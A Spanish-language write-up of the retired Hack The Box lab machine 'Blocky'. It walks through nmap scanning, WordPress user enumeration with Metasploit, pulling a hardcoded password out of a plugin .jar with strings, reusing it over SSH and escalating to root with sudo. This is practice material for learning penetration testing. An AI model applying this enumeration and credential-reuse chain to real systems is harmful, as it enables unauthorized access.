Writeup — HTB Blocky
by Andoni A.
Buenas, aprovechando que retiraban esta máquina, Blocky, de HTB (hasta que no los retiran no está permitido publicar writeups sobre sus retos) quería publicar mi primer writeup.
Esta máquina era bastante sencilla, lo más dificil era no perder el tiempo siguiendo alguna “pista falsa”.
- Como casi siempre, empezamos lanzando un escaneo con NMAP, veo un FTP, SSH y un Apache:
PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5a 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA) |_ 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: WordPress 4.8 | http-methods: |_ Supported Methods: GET HEAD POST |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: BlockyCraft – Under Construction! 8192/tcp closed sophos
- El Apache aloja a simple vista un WordPress, parece simular ser la web de un server de Minecraft.
- Con un módulo de enumeración de usuariosde WP descubrimos el usuario ‘notch’:
msf auxiliary(wordpress_login_enum) > run -j [*] Auxiliary module running as background job 7. [*] / - WordPress Version 4.8 detected [*] 10.10.10.37:80 - / - WordPress User-Enumeration - Running User Enumeration [+] / - Found user 'notch' with id 1 [+] / - Usernames stored in: /root/.msf4/loot/20171206134659_default_10.10.10.37_wordpress.users_138712.txt
- Pruebo un par de contraseñas a mano pero nada…
- Para ver que más puede contener la web uso dirb y descubro algunas urls
interesantes como:
- http://10.10.10.37/phpmyadmin
- Probamos el usuario notch con varias claves, nada…
- http://10.10.10.37/plugins/
- Contiene un par de .jar que descargo para ver si tienen algo interesante.
- http://10.10.10.37/phpmyadmin
- Empiezo por ‘BlockyCore.jar’ ya que parece más “custom” que ‘griefprevention-1.11.2-3.1.1.298.jar’ y puede que tenga algún fallo:
venom :: Machines/Blocky/BlockyCore_jar » strings com/myfirstplugin/BlockyCore.class com/myfirstplugin/BlockyCore java/lang/Object sqlHost Ljava/lang/String; sqlUser sqlPass <init> Code localhost root 8YsqfCTnvxAUeduzjNSXe22 LineNumberTable LocalVariableTable this Lcom/myfirstplugin/BlockyCore; onServerStart onServerStop onPlayerJoin TODO get username !Welcome to the BlockyCraft!!!!!!! sendMessage '(Ljava/lang/String;Ljava/lang/String;)V username message SourceFile BlockyCore.java
- Veo lo que parece un user/pass:
root 8YsqfCTnvxAUeduzjNSXe22
- Probamos en el login de WP pero no funciona, pruebo por SSH:
venom :: Machines/Blocky » ssh root@10.10.10.37 root@10.10.10.37's password: venom :: Machines/Blocky » ssh notch@10.10.10.37 notch@10.10.10.37's password: Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 7 packages can be updated. 7 updates are security updates. Last login: Fri Dec 8 02:16:15 2017 from 10.10.14.79 notch@Blocky:~$
- En el home de notch tenemos la flag del user.
- Y después con un simple ‘sudo su’ accedo al usuario ‘root’ y obtengo la flag.
Como he dicho, esta máquina era bastante sencilla aunque me costó un buen rato encontrar algo dentro de los .jar…
Espero poder sacar un rato y subir alguno de los retos que me parecieron interesantes del CTF de la HoneyCON17.
~ Saludos y que la fuerza os acompañe!
Suscríbete via RSS